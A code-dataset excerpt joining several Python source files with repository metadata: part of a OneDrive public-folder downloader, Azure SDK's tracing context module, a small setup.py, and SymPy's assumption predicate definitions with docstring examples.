file["name"] = (name + os.sep + child["name"]).lstrip(os.sep)
file["url"] = child["@content.downloadUrl"]
self.to_download.append(file)
print(f"Found {file['name']}")
async def _download_file(self, file, session):
async with session.get(file["url"], timeout=None) as r:
filename = os.path.join(self.path, file["name"])
os.makedirs(os.path.dirname(filename), exist_ok=True)
async with aiofiles.open(filename, "wb") as f:
async for chunk in r.content.iter_chunked(1024 * 16):
if chunk:
await f.write(chunk)
self.downloaded += 1
progress = int(self.downloaded / len(self.to_download) * 100)
print(f"Download progress: {progress}%")
async def _downloader(self):
async with aiohttp.ClientSession() as session:
await asyncio.wait(
[self._download_file(file, session) for file in self.to_download]
)
def download(self):
print("Traversing public folder\n")
self.to_download = []
self.downloaded = 0
self._traverse_url(self.url)
print("\nStarting async download\n")
asyncio.get_event_loop().run_until_complete(self._downloader())
# path could be relative to current working directory of script
# or absolute (e.g. C:\\Users\\Username\\Desktop, /home/username/Desktop)
folder = OneDrive(url="https://1drv.ms/u/s!Aus8VCZ_C_33cMkPimlmClRvmpw", path="Desktop")
folder = OneDrive(url="https://1drv.ms/u/s!AiWjZ1LamlxzdmYbSkHpPYhI8Ms", path=r"D:\project\face\HRNet-Facial-Landmark-Detection")
# fire download
folder.download()
| 34.621359
| 129
| 0.593943
|
f8761cd71502a0f3d88b93dcb63b418003b13263
| 4,244
|
py
|
Python
|
sdk/core/azure-core/azure/core/tracing/context.py
|
jiasli/azure-sdk-for-python
|
f700299c45cea44064d5156f2bfe3664284f6da4
|
[
"MIT"
] | null | null | null |
sdk/core/azure-core/azure/core/tracing/context.py
|
jiasli/azure-sdk-for-python
|
f700299c45cea44064d5156f2bfe3664284f6da4
|
[
"MIT"
] | null | null | null |
sdk/core/azure-core/azure/core/tracing/context.py
|
jiasli/azure-sdk-for-python
|
f700299c45cea44064d5156f2bfe3664284f6da4
|
[
"MIT"
] | null | null | null |
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
"""The context for the azure.core.tracing. Holds global variables in a thread and async safe way."""
import threading
from azure.core.settings import settings
try:
from typing import TYPE_CHECKING
except ImportError:
TYPE_CHECKING = False
if TYPE_CHECKING:
from typing import Any, Callable
from typing_extensions import Protocol
else:
Protocol = object
try:
import contextvars
except ImportError:
contextvars = None
class ContextProtocol(Protocol):
"""
Protocol for setting and getting variables in a thread-safe way.
"""
def __init__(self, name, default):
# type: (str, Any) -> None
pass
def clear(self):
# type: () -> None
"""Reset the value to the default value"""
pass
def get(self):
# type: () -> Any
"""Get the stored value."""
pass
def set(self, value):
# type: (Any) -> None
"""Set the value in the context."""
pass
class _AsyncContext(object):
"""
Uses contextvars to set and get variables globally in a thread safe way.
"""
def __init__(self, name, default):
self.name = name
self.contextvar = contextvars.ContextVar(name)
self.default = default if callable(default) else (lambda: default)
def clear(self):
# type: () -> None
"""Reset the value to the default value"""
self.contextvar.set(self.default())
def get(self):
# type: () -> Any
"""Get the stored value."""
try:
return self.contextvar.get()
except LookupError:
value = self.default()
self.set(value)
return value
def set(self, value):
# type: (Any) -> None
"""Set the value in the context."""
self.contextvar.set(value)
class _ThreadLocalContext(object):
"""
Uses thread local storage to set and get variables globally in a thread safe way.
"""
_thread_local = threading.local()
def __init__(self, name, default):
# type: (str, Any) -> None
self.name = name
self.default = default if callable(default) else (lambda: default)
def clear(self):
# type: () -> None
"""Reset the value to the default value"""
setattr(self._thread_local, self.name, self.default())
def get(self):
# type: () -> Any
"""Get the stored value."""
try:
return getattr(self._thread_local, self.name)
except AttributeError:
value = self.default()
self.set(value)
return value
def set(self, value):
# type: (Any) -> None
"""Set the value in the context."""
setattr(self._thread_local, self.name, value)
class TracingContext(object):
def __init__(self):
# type: () -> None
context_class = _AsyncContext if contextvars else _ThreadLocalContext
self.current_span = context_class("current_span", None)
def with_current_context(self, func):
# type: (Callable[[Any], Any]) -> Any
"""
Passes the current spans to the new context the function will be run in.
:param func: The function that will be run in the new context
:return: The target the pass in instead of the function
"""
wrapped_span = tracing_context.current_span.get()
wrapper_class = settings.tracing_implementation()
if wrapper_class is not None:
current_impl_span = wrapper_class.get_current_span()
current_impl_tracer = wrapper_class.get_current_tracer()
def call_with_current_context(*args, **kwargs):
if wrapper_class is not None:
wrapper_class.set_current_span(current_impl_span)
wrapper_class.set_current_tracer(current_impl_tracer)
current_span = wrapped_span or wrapper_class(current_impl_span)
self.current_span.set(current_span)
return func(*args, **kwargs)
return call_with_current_context
tracing_context = TracingContext()
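# --- Illustrative sketch (assumption, not part of the SDK module) ---
# Propagating the current span into a worker thread by wrapping the thread
# target with `with_current_context`. The worker function and thread name are
# made up for demonstration.
def _example_worker():
    # Inside the wrapped call, the span that was current when the wrapper was
    # created is visible again through the tracing context.
    return tracing_context.current_span.get()

def _example_run_in_thread():
    worker = threading.Thread(
        target=tracing_context.with_current_context(_example_worker),
        name="tracing-context-example",
    )
    worker.start()
    worker.join()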
| 29.268966
| 100
| 0.604147
|
36f0a43c5b8ceebcc1d995c30a228f020a92105d
| 343
|
py
|
Python
|
setup.py
|
zackchase/beermind
|
695fd1b2f6d376b6dd9f70ba2cd2c13e5efb9c47
|
[
"MIT"
] | 3
|
2016-12-15T11:54:33.000Z
|
2017-06-08T21:10:58.000Z
|
setup.py
|
zackchase/beermind
|
695fd1b2f6d376b6dd9f70ba2cd2c13e5efb9c47
|
[
"MIT"
] | null | null | null |
setup.py
|
zackchase/beermind
|
695fd1b2f6d376b6dd9f70ba2cd2c13e5efb9c47
|
[
"MIT"
] | 2
|
2017-10-13T18:34:36.000Z
|
2020-01-25T03:46:31.000Z
|
from setuptools import setup, find_packages
setup(
name = "deepx",
version = "0.0.0",
author = "Zachary Chase Lipton, Sharad Vikram",
author_email = "sharad.vikram@gmail.com",
license = "MIT",
keywords = "theano",
packages=find_packages(include=[
'deepx',
'dataset',
]),
classifiers=[
],
)
| 20.176471
| 51
| 0.597668
|
b79995b85c0787995083e8174fdd7e29eeab464c
| 43,523
|
py
|
Python
|
sympy/assumptions/ask.py
|
darknight009/sympy
|
618193720b862a41aa295d474793cc12e4de2927
|
[
"BSD-3-Clause"
] | 1
|
2017-04-27T15:45:41.000Z
|
2017-04-27T15:45:41.000Z
|
sympy/assumptions/ask.py
|
darknight009/sympy
|
618193720b862a41aa295d474793cc12e4de2927
|
[
"BSD-3-Clause"
] | 1
|
2015-11-01T17:20:32.000Z
|
2015-11-01T17:20:32.000Z
|
sympy/assumptions/ask.py
|
darknight009/sympy
|
618193720b862a41aa295d474793cc12e4de2927
|
[
"BSD-3-Clause"
] | 1
|
2018-10-22T09:17:11.000Z
|
2018-10-22T09:17:11.000Z
|
"""Module for querying SymPy objects about assumptions."""
from __future__ import print_function, division
from sympy.core import sympify
from sympy.core.cache import cacheit
from sympy.core.relational import Relational
from sympy.logic.boolalg import (to_cnf, And, Not, Or, Implies, Equivalent,
BooleanFunction, BooleanAtom)
from sympy.logic.inference import satisfiable
from sympy.assumptions.assume import (global_assumptions, Predicate,
AppliedPredicate)
from sympy.core.decorators import deprecated
from sympy.utilities.decorator import memoize_property
# Deprecated predicates should be added to this list
deprecated_predicates = [
'bounded',
'infinity',
'infinitesimal'
]
# Memoization storage for predicates
predicate_storage = {}
predicate_memo = memoize_property(predicate_storage)
# Memoization is necessary for the properties of AssumptionKeys to
# ensure that only one Predicate object is created for each key.
# This is because assumption handlers are registered on those objects.
class AssumptionKeys(object):
"""
This class contains all the supported keys by ``ask``.
"""
@predicate_memo
def hermitian(self):
"""
Hermitian predicate.
``ask(Q.hermitian(x))`` is true iff ``x`` belongs to the set of
Hermitian operators.
References
==========
.. [1] http://mathworld.wolfram.com/HermitianOperator.html
"""
# TODO: Add examples
return Predicate('hermitian')
@predicate_memo
def antihermitian(self):
"""
Antihermitian predicate.
``Q.antihermitian(x)`` is true iff ``x`` belongs to the field of
antihermitian operators, i.e., operators in the form ``x*I``, where
``x`` is Hermitian.
References
==========
.. [1] http://mathworld.wolfram.com/HermitianOperator.html
"""
# TODO: Add examples
return Predicate('antihermitian')
@predicate_memo
def real(self):
r"""
Real number predicate.
``Q.real(x)`` is true iff ``x`` is a real number, i.e., it is in the
interval `(-\infty, \infty)`. Note that, in particular the infinities
are not real. Use ``Q.extended_real`` if you want to consider those as
well.
A few important facts about reals:
- Every real number is positive, negative, or zero. Furthermore,
because these sets are pairwise disjoint, each real number is exactly
one of those three.
- Every real number is also complex.
- Every real number is finite.
- Every real number is either rational or irrational.
- Every real number is either algebraic or transcendental.
- The facts ``Q.negative``, ``Q.zero``, ``Q.positive``,
``Q.nonnegative``, ``Q.nonpositive``, ``Q.nonzero``, ``Q.integer``,
``Q.rational``, and ``Q.irrational`` all imply ``Q.real``, as do all
facts that imply those facts.
- The facts ``Q.algebraic``, and ``Q.transcendental`` do not imply
``Q.real``; they imply ``Q.complex``. An algebraic or transcendental
number may or may not be real.
- The "non" facts (i.e., ``Q.nonnegative``, ``Q.nonzero``,
``Q.nonpositive`` and ``Q.noninteger``) are not equivalent to not the
fact, but rather, not the fact *and* ``Q.real``. For example,
``Q.nonnegative`` means ``~Q.negative & Q.real``. So for example,
``I`` is not nonnegative, nonzero, or nonpositive.
Examples
========
>>> from sympy import Q, ask, symbols
>>> x = symbols('x')
>>> ask(Q.real(x), Q.positive(x))
True
>>> ask(Q.real(0))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Real_number
"""
return Predicate('real')
@predicate_memo
def extended_real(self):
r"""
Extended real predicate.
``Q.extended_real(x)`` is true iff ``x`` is a real number or
`\{-\infty, \infty\}`.
See documentation of ``Q.real`` for more information about related facts.
Examples
========
>>> from sympy import ask, Q, oo, I
>>> ask(Q.extended_real(1))
True
>>> ask(Q.extended_real(I))
False
>>> ask(Q.extended_real(oo))
True
"""
return Predicate('extended_real')
@predicate_memo
def imaginary(self):
"""
Imaginary number predicate.
``Q.imaginary(x)`` is true iff ``x`` can be written as a real
number multiplied by the imaginary unit ``I``. Please note that ``0``
is not considered to be an imaginary number.
Examples
========
>>> from sympy import Q, ask, I
>>> ask(Q.imaginary(3*I))
True
>>> ask(Q.imaginary(2 + 3*I))
False
>>> ask(Q.imaginary(0))
False
References
==========
.. [1] https://en.wikipedia.org/wiki/Imaginary_number
"""
return Predicate('imaginary')
@predicate_memo
def complex(self):
"""
Complex number predicate.
``Q.complex(x)`` is true iff ``x`` belongs to the set of complex
numbers. Note that every complex number is finite.
Examples
========
>>> from sympy import Q, Symbol, ask, I, oo
>>> x = Symbol('x')
>>> ask(Q.complex(0))
True
>>> ask(Q.complex(2 + 3*I))
True
>>> ask(Q.complex(oo))
False
References
==========
.. [1] https://en.wikipedia.org/wiki/Complex_number
"""
return Predicate('complex')
@predicate_memo
def algebraic(self):
r"""
Algebraic number predicate.
``Q.algebraic(x)`` is true iff ``x`` belongs to the set of
algebraic numbers. ``x`` is algebraic if there is some polynomial
in ``p(x) \in \mathbb{Q}[x]`` such that ``p(x) = 0``.
Examples
========
>>> from sympy import ask, Q, sqrt, I, pi
>>> ask(Q.algebraic(sqrt(2)))
True
>>> ask(Q.algebraic(I))
True
>>> ask(Q.algebraic(pi))
False
References
==========
.. [1] http://en.wikipedia.org/wiki/Algebraic_number
"""
return Predicate('algebraic')
@predicate_memo
def transcendental(self):
"""
Transcendental number predicate.
``Q.transcendental(x)`` is true iff ``x`` belongs to the set of
transcendental numbers. A transcendental number is a real
or complex number that is not algebraic.
"""
# TODO: Add examples
return Predicate('transcendental')
@predicate_memo
def integer(self):
"""
Integer predicate.
``Q.integer(x)`` is true iff ``x`` belongs to the set of integer numbers.
Examples
========
>>> from sympy import Q, ask, S
>>> ask(Q.integer(5))
True
>>> ask(Q.integer(S(1)/2))
False
References
==========
.. [1] https://en.wikipedia.org/wiki/Integer
"""
return Predicate('integer')
@predicate_memo
def rational(self):
"""
Rational number predicate.
``Q.rational(x)`` is true iff ``x`` belongs to the set of
rational numbers.
Examples
========
>>> from sympy import ask, Q, pi, S
>>> ask(Q.rational(0))
True
>>> ask(Q.rational(S(1)/2))
True
>>> ask(Q.rational(pi))
False
References
==========
.. [1] https://en.wikipedia.org/wiki/Rational_number
"""
return Predicate('rational')
@predicate_memo
def irrational(self):
"""
Irrational number predicate.
``Q.irrational(x)`` is true iff ``x`` is any real number that
cannot be expressed as a ratio of integers.
Examples
========
>>> from sympy import ask, Q, pi, S, I
>>> ask(Q.irrational(0))
False
>>> ask(Q.irrational(S(1)/2))
False
>>> ask(Q.irrational(pi))
True
>>> ask(Q.irrational(I))
False
References
==========
.. [1] https://en.wikipedia.org/wiki/Irrational_number
"""
return Predicate('irrational')
@predicate_memo
def finite(self):
"""
Finite predicate.
``Q.finite(x)`` is true if ``x`` is neither an infinity
nor a ``NaN``. In other words, ``ask(Q.finite(x))`` is true for all ``x``
having a bounded absolute value.
Examples
========
>>> from sympy import Q, ask, Symbol, S, oo, I
>>> x = Symbol('x')
>>> ask(Q.finite(S.NaN))
False
>>> ask(Q.finite(oo))
False
>>> ask(Q.finite(1))
True
>>> ask(Q.finite(2 + 3*I))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Finite
"""
return Predicate('finite')
@predicate_memo
@deprecated(useinstead="finite", issue=9425, deprecated_since_version="1.0")
def bounded(self):
"""
See documentation of ``Q.finite``.
"""
return Predicate('finite')
@predicate_memo
def infinite(self):
"""
Infinite number predicate.
``Q.infinite(x)`` is true iff the absolute value of ``x`` is
infinity.
"""
# TODO: Add examples
return Predicate('infinite')
@predicate_memo
@deprecated(useinstead="infinite", issue=9426, deprecated_since_version="1.0")
def infinity(self):
"""
See documentation of ``Q.infinite``.
"""
return Predicate('infinite')
@predicate_memo
@deprecated(useinstead="zero", issue=9675, deprecated_since_version="1.0")
def infinitesimal(self):
"""
See documentation of ``Q.zero``.
"""
return Predicate('zero')
@predicate_memo
def positive(self):
r"""
Positive real number predicate.
``Q.positive(x)`` is true iff ``x`` is real and `x > 0`, that is if ``x``
is in the interval `(0, \infty)`. In particular, infinity is not
positive.
A few important facts about positive numbers:
- Note that ``Q.nonpositive`` and ``~Q.positive`` are *not* the same
thing. ``~Q.positive(x)`` simply means that ``x`` is not positive,
whereas ``Q.nonpositive(x)`` means that ``x`` is real and not
positive, i.e., ``Q.nonpositive(x)`` is logically equivalent to
``Q.negative(x) | Q.zero(x)``. So for example, ``~Q.positive(I)`` is
true, whereas ``Q.nonpositive(I)`` is false.
- See the documentation of ``Q.real`` for more information about
related facts.
Examples
========
>>> from sympy import Q, ask, symbols, I
>>> x = symbols('x')
>>> ask(Q.positive(x), Q.real(x) & ~Q.negative(x) & ~Q.zero(x))
True
>>> ask(Q.positive(1))
True
>>> ask(Q.nonpositive(I))
False
>>> ask(~Q.positive(I))
True
"""
return Predicate('positive')
@predicate_memo
def negative(self):
r"""
Negative number predicate.
``Q.negative(x)`` is true iff ``x`` is a real number and :math:`x < 0`, that is,
it is in the interval :math:`(-\infty, 0)`. Note in particular that negative
infinity is not negative.
A few important facts about negative numbers:
- Note that ``Q.nonnegative`` and ``~Q.negative`` are *not* the same
thing. ``~Q.negative(x)`` simply means that ``x`` is not negative,
whereas ``Q.nonnegative(x)`` means that ``x`` is real and not
negative, i.e., ``Q.nonnegative(x)`` is logically equivalent to
``Q.zero(x) | Q.positive(x)``. So for example, ``~Q.negative(I)`` is
true, whereas ``Q.nonnegative(I)`` is false.
- See the documentation of ``Q.real`` for more information about
related facts.
Examples
========
>>> from sympy import Q, ask, symbols, I
>>> x = symbols('x')
>>> ask(Q.negative(x), Q.real(x) & ~Q.positive(x) & ~Q.zero(x))
True
>>> ask(Q.negative(-1))
True
>>> ask(Q.nonnegative(I))
False
>>> ask(~Q.negative(I))
True
"""
return Predicate('negative')
@predicate_memo
def zero(self):
"""
Zero number predicate.
``ask(Q.zero(x))`` is true iff the value of ``x`` is zero.
Examples
========
>>> from sympy import ask, Q, oo, symbols
>>> x, y = symbols('x, y')
>>> ask(Q.zero(0))
True
>>> ask(Q.zero(1/oo))
True
>>> ask(Q.zero(0*oo))
False
>>> ask(Q.zero(1))
False
>>> ask(Q.zero(x*y), Q.zero(x) | Q.zero(y))
True
"""
return Predicate('zero')
@predicate_memo
def nonzero(self):
"""
Nonzero real number predicate.
``ask(Q.nonzero(x))`` is true iff ``x`` is real and ``x`` is not zero. Note in
particular that ``Q.nonzero(x)`` is false if ``x`` is not real. Use
``~Q.zero(x)`` if you want the negation of being zero without any real
assumptions.
A few important facts about nonzero numbers:
- ``Q.nonzero`` is logically equivalent to ``Q.positive | Q.negative``.
- See the documentation of ``Q.real`` for more information about
related facts.
Examples
========
>>> from sympy import Q, ask, symbols, I, oo
>>> x = symbols('x')
>>> print(ask(Q.nonzero(x), ~Q.zero(x)))
None
>>> ask(Q.nonzero(x), Q.positive(x))
True
>>> ask(Q.nonzero(x), Q.zero(x))
False
>>> ask(Q.nonzero(0))
False
>>> ask(Q.nonzero(I))
False
>>> ask(~Q.zero(I))
True
>>> ask(Q.nonzero(oo)) #doctest: +SKIP
False
"""
return Predicate('nonzero')
@predicate_memo
def nonpositive(self):
"""
Nonpositive real number predicate.
``ask(Q.nonpositive(x))`` is true iff ``x`` belongs to the set of
negative numbers including zero.
- Note that ``Q.nonpositive`` and ``~Q.positive`` are *not* the same
thing. ``~Q.positive(x)`` simply means that ``x`` is not positive,
whereas ``Q.nonpositive(x)`` means that ``x`` is real and not
positive, i.e., ``Q.nonpositive(x)`` is logically equivalent to
``Q.negative(x) | Q.zero(x)``. So for example, ``~Q.positive(I)`` is
true, whereas ``Q.nonpositive(I)`` is false.
Examples
========
>>> from sympy import Q, ask, I
>>> ask(Q.nonpositive(-1))
True
>>> ask(Q.nonpositive(0))
True
>>> ask(Q.nonpositive(1))
False
>>> ask(Q.nonpositive(I))
False
>>> ask(Q.nonpositive(-I))
False
"""
return Predicate('nonpositive')
@predicate_memo
def nonnegative(self):
"""
Nonnegative real number predicate.
``ask(Q.nonnegative(x))`` is true iff ``x`` belongs to the set of
positive numbers including zero.
- Note that ``Q.nonnegative`` and ``~Q.negative`` are *not* the same
thing. ``~Q.negative(x)`` simply means that ``x`` is not negative,
whereas ``Q.nonnegative(x)`` means that ``x`` is real and not
negative, i.e., ``Q.nonnegative(x)`` is logically equivalent to
``Q.zero(x) | Q.positive(x)``. So for example, ``~Q.negative(I)`` is
true, whereas ``Q.nonnegative(I)`` is false.
Examples
========
>>> from sympy import Q, ask, I
>>> ask(Q.nonnegative(1))
True
>>> ask(Q.nonnegative(0))
True
>>> ask(Q.nonnegative(-1))
False
>>> ask(Q.nonnegative(I))
False
>>> ask(Q.nonnegative(-I))
False
"""
return Predicate('nonnegative')
@predicate_memo
def even(self):
"""
Even number predicate.
``ask(Q.even(x))`` is true iff ``x`` belongs to the set of even
integers.
Examples
========
>>> from sympy import Q, ask, pi
>>> ask(Q.even(0))
True
>>> ask(Q.even(2))
True
>>> ask(Q.even(3))
False
>>> ask(Q.even(pi))
False
"""
return Predicate('even')
@predicate_memo
def odd(self):
"""
Odd number predicate.
``ask(Q.odd(x))`` is true iff ``x`` belongs to the set of odd numbers.
Examples
========
>>> from sympy import Q, ask, pi
>>> ask(Q.odd(0))
False
>>> ask(Q.odd(2))
False
>>> ask(Q.odd(3))
True
>>> ask(Q.odd(pi))
False
"""
return Predicate('odd')
@predicate_memo
def prime(self):
"""
Prime number predicate.
``ask(Q.prime(x))`` is true iff ``x`` is a natural number greater
than 1 that has no positive divisors other than ``1`` and the
number itself.
Examples
========
>>> from sympy import Q, ask
>>> ask(Q.prime(0))
False
>>> ask(Q.prime(1))
False
>>> ask(Q.prime(2))
True
>>> ask(Q.prime(20))
False
>>> ask(Q.prime(-3))
False
"""
return Predicate('prime')
@predicate_memo
def composite(self):
"""
Composite number predicate.
``ask(Q.composite(x))`` is true iff ``x`` is a positive integer and has
at least one positive divisor other than ``1`` and the number itself.
Examples
========
>>> from sympy import Q, ask
>>> ask(Q.composite(0))
False
>>> ask(Q.composite(1))
False
>>> ask(Q.composite(2))
False
>>> ask(Q.composite(20))
True
"""
return Predicate('composite')
@predicate_memo
def commutative(self):
"""
Commutative predicate.
``ask(Q.commutative(x))`` is true iff ``x`` commutes with any other
object with respect to multiplication operation.
"""
# TODO: Add examples
return Predicate('commutative')
@predicate_memo
def is_true(self):
"""
Generic predicate.
``ask(Q.is_true(x))`` is true iff ``x`` is true. This only makes
sense if ``x`` is a predicate.
Examples
========
>>> from sympy import ask, Q, symbols
>>> x = symbols('x')
>>> ask(Q.is_true(True))
True
"""
return Predicate('is_true')
@predicate_memo
def symmetric(self):
"""
Symmetric matrix predicate.
``Q.symmetric(x)`` is true iff ``x`` is a square matrix and is equal to
its transpose. Every square diagonal matrix is a symmetric matrix.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol
>>> X = MatrixSymbol('X', 2, 2)
>>> Y = MatrixSymbol('Y', 2, 3)
>>> Z = MatrixSymbol('Z', 2, 2)
>>> ask(Q.symmetric(X*Z), Q.symmetric(X) & Q.symmetric(Z))
True
>>> ask(Q.symmetric(X + Z), Q.symmetric(X) & Q.symmetric(Z))
True
>>> ask(Q.symmetric(Y))
False
References
==========
.. [1] https://en.wikipedia.org/wiki/Symmetric_matrix
"""
# TODO: Add handlers to make these keys work with
# actual matrices and add more examples in the docstring.
return Predicate('symmetric')
@predicate_memo
def invertible(self):
"""
Invertible matrix predicate.
``Q.invertible(x)`` is true iff ``x`` is an invertible matrix.
A square matrix is called invertible only if its determinant is nonzero.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol
>>> X = MatrixSymbol('X', 2, 2)
>>> Y = MatrixSymbol('Y', 2, 3)
>>> Z = MatrixSymbol('Z', 2, 2)
>>> ask(Q.invertible(X*Y), Q.invertible(X))
False
>>> ask(Q.invertible(X*Z), Q.invertible(X) & Q.invertible(Z))
True
>>> ask(Q.invertible(X), Q.fullrank(X) & Q.square(X))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Invertible_matrix
"""
return Predicate('invertible')
@predicate_memo
def orthogonal(self):
"""
Orthogonal matrix predicate.
``Q.orthogonal(x)`` is true iff ``x`` is an orthogonal matrix.
A square matrix ``M`` is an orthogonal matrix if it satisfies
``M^TM = MM^T = I`` where ``M^T`` is the transpose matrix of
``M`` and ``I`` is an identity matrix. Note that an orthogonal
matrix is necessarily invertible.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol, Identity
>>> X = MatrixSymbol('X', 2, 2)
>>> Y = MatrixSymbol('Y', 2, 3)
>>> Z = MatrixSymbol('Z', 2, 2)
>>> ask(Q.orthogonal(Y))
False
>>> ask(Q.orthogonal(X*Z*X), Q.orthogonal(X) & Q.orthogonal(Z))
True
>>> ask(Q.orthogonal(Identity(3)))
True
>>> ask(Q.invertible(X), Q.orthogonal(X))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Orthogonal_matrix
"""
return Predicate('orthogonal')
@predicate_memo
def unitary(self):
"""
Unitary matrix predicate.
``Q.unitary(x)`` is true iff ``x`` is a unitary matrix.
Unitary matrix is an analogue to orthogonal matrix. A square
matrix ``M`` with complex elements is unitary if ``M^TM = MM^T = I``
where ``M^T`` is the conjugate transpose matrix of ``M``.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol, Identity
>>> X = MatrixSymbol('X', 2, 2)
>>> Y = MatrixSymbol('Y', 2, 3)
>>> Z = MatrixSymbol('Z', 2, 2)
>>> ask(Q.unitary(Y))
False
>>> ask(Q.unitary(X*Z*X), Q.unitary(X) & Q.unitary(Z))
True
>>> ask(Q.unitary(Identity(3)))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Unitary_matrix
"""
return Predicate('unitary')
@predicate_memo
def positive_definite(self):
r"""
Positive definite matrix predicate.
If ``M`` is a :math:`n \times n` symmetric real matrix, it is said
to be positive definite if :math:`Z^TMZ` is positive for
every non-zero column vector ``Z`` of ``n`` real numbers.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol, Identity
>>> X = MatrixSymbol('X', 2, 2)
>>> Y = MatrixSymbol('Y', 2, 3)
>>> Z = MatrixSymbol('Z', 2, 2)
>>> ask(Q.positive_definite(Y))
False
>>> ask(Q.positive_definite(Identity(3)))
True
>>> ask(Q.positive_definite(X + Z), Q.positive_definite(X) &
... Q.positive_definite(Z))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Positive-definite_matrix
"""
return Predicate('positive_definite')
@predicate_memo
def upper_triangular(self):
"""
Upper triangular matrix predicate.
A matrix ``M`` is called an upper triangular matrix if :math:`M_{ij}=0`
for :math:`i>j`, i.e. if all entries below the main diagonal are zero.
Examples
========
>>> from sympy import Q, ask, ZeroMatrix, Identity
>>> ask(Q.upper_triangular(Identity(3)))
True
>>> ask(Q.upper_triangular(ZeroMatrix(3, 3)))
True
References
==========
.. [1] http://mathworld.wolfram.com/UpperTriangularMatrix.html
"""
return Predicate('upper_triangular')
@predicate_memo
def lower_triangular(self):
"""
Lower triangular matrix predicate.
A matrix ``M`` is called a lower triangular matrix if :math:`M_{ij}=0`
for :math:`i<j`, i.e. if all entries above the main diagonal are zero.
Examples
========
>>> from sympy import Q, ask, ZeroMatrix, Identity
>>> ask(Q.lower_triangular(Identity(3)))
True
>>> ask(Q.lower_triangular(ZeroMatrix(3, 3)))
True
References
==========
.. [1] http://mathworld.wolfram.com/LowerTriangularMatrix.html
"""
return Predicate('lower_triangular')
@predicate_memo
def diagonal(self):
"""
Diagonal matrix predicate.
``Q.diagonal(x)`` is true iff ``x`` is a diagonal matrix. A diagonal
matrix is a matrix in which the entries outside the main diagonal
are all zero.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol, ZeroMatrix
>>> X = MatrixSymbol('X', 2, 2)
>>> ask(Q.diagonal(ZeroMatrix(3, 3)))
True
>>> ask(Q.diagonal(X), Q.lower_triangular(X) &
... Q.upper_triangular(X))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Diagonal_matrix
"""
return Predicate('diagonal')
@predicate_memo
def fullrank(self):
"""
Fullrank matrix predicate.
``Q.fullrank(x)`` is true iff ``x`` is a full rank matrix.
A matrix is full rank if all rows and columns of the matrix
are linearly independent. A square matrix is full rank iff
its determinant is nonzero.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol, ZeroMatrix, Identity
>>> X = MatrixSymbol('X', 2, 2)
>>> ask(Q.fullrank(X.T), Q.fullrank(X))
True
>>> ask(Q.fullrank(ZeroMatrix(3, 3)))
False
>>> ask(Q.fullrank(Identity(3)))
True
"""
return Predicate('fullrank')
@predicate_memo
def square(self):
"""
Square matrix predicate.
``Q.square(x)`` is true iff ``x`` is a square matrix. A square matrix
is a matrix with the same number of rows and columns.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol, ZeroMatrix, Identity
>>> X = MatrixSymbol('X', 2, 2)
>>> Y = MatrixSymbol('X', 2, 3)
>>> ask(Q.square(X))
True
>>> ask(Q.square(Y))
False
>>> ask(Q.square(ZeroMatrix(3, 3)))
True
>>> ask(Q.square(Identity(3)))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Square_matrix
"""
return Predicate('square')
@predicate_memo
def integer_elements(self):
"""
Integer elements matrix predicate.
``Q.integer_elements(x)`` is true iff all the elements of ``x``
are integers.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol
>>> X = MatrixSymbol('X', 4, 4)
>>> ask(Q.integer(X[1, 2]), Q.integer_elements(X))
True
"""
return Predicate('integer_elements')
@predicate_memo
def real_elements(self):
"""
Real elements matrix predicate.
``Q.real_elements(x)`` is true iff all the elements of ``x``
are real numbers.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol
>>> X = MatrixSymbol('X', 4, 4)
>>> ask(Q.real(X[1, 2]), Q.real_elements(X))
True
"""
return Predicate('real_elements')
@predicate_memo
def complex_elements(self):
"""
Complex elements matrix predicate.
``Q.complex_elements(x)`` is true iff all the elements of ``x``
are complex numbers.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol
>>> X = MatrixSymbol('X', 4, 4)
>>> ask(Q.complex(X[1, 2]), Q.complex_elements(X))
True
>>> ask(Q.complex_elements(X), Q.integer_elements(X))
True
"""
return Predicate('complex_elements')
@predicate_memo
def singular(self):
"""
Singular matrix predicate.
A matrix is singular iff the value of its determinant is 0.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol
>>> X = MatrixSymbol('X', 4, 4)
>>> ask(Q.singular(X), Q.invertible(X))
False
>>> ask(Q.singular(X), ~Q.invertible(X))
True
References
==========
.. [1] http://mathworld.wolfram.com/SingularMatrix.html
"""
return Predicate('singular')
@predicate_memo
def normal(self):
"""
Normal matrix predicate.
A matrix is normal if it commutes with its conjugate transpose.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol
>>> X = MatrixSymbol('X', 4, 4)
>>> ask(Q.normal(X), Q.unitary(X))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Normal_matrix
"""
return Predicate('normal')
@predicate_memo
def triangular(self):
"""
Triangular matrix predicate.
``Q.triangular(X)`` is true if ``X`` is either lower
triangular or upper triangular.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol
>>> X = MatrixSymbol('X', 4, 4)
>>> ask(Q.triangular(X), Q.upper_triangular(X))
True
>>> ask(Q.triangular(X), Q.lower_triangular(X))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Triangular_matrix
"""
return Predicate('triangular')
@predicate_memo
def unit_triangular(self):
"""
Unit triangular matrix predicate.
A unit triangular matrix is a triangular matrix with 1s
on the diagonal.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol
>>> X = MatrixSymbol('X', 4, 4)
>>> ask(Q.triangular(X), Q.unit_triangular(X))
True
"""
return Predicate('unit_triangular')
Q = AssumptionKeys()
